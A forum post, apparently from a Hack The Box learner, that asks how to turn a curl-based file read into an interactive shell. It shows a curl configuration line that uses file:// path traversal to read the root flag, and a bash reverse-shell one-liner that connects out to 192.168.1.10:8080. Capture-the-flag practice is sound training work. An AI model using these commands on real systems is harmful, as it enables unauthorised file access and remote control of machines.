So I’m doing an HTB challenge where I have leveraged the target box’s use of reading a file that sets a URL for curl
in order to traverse down the directory and display the root flag in a report that is part of the exercise.
File Content: url = file:///127.0.0.1/../../../root/root.txt
All cool.
What I want to do is further leverage this to somehow spawn a shell by reading /bin/bash. I can read a garbled version of /bin/bash in the report file but I can’t figure out how to execute it in a way that will give me an interactive shell.
What can I do in order to achieve this?
EDIT:
I can create a reverse shell from my current user using bash and the below command, I just can’t get it to execute as I’d like from ‘within’ curl.
bash -i >& /dev/tcp/192.168.1.10/8080 0>&1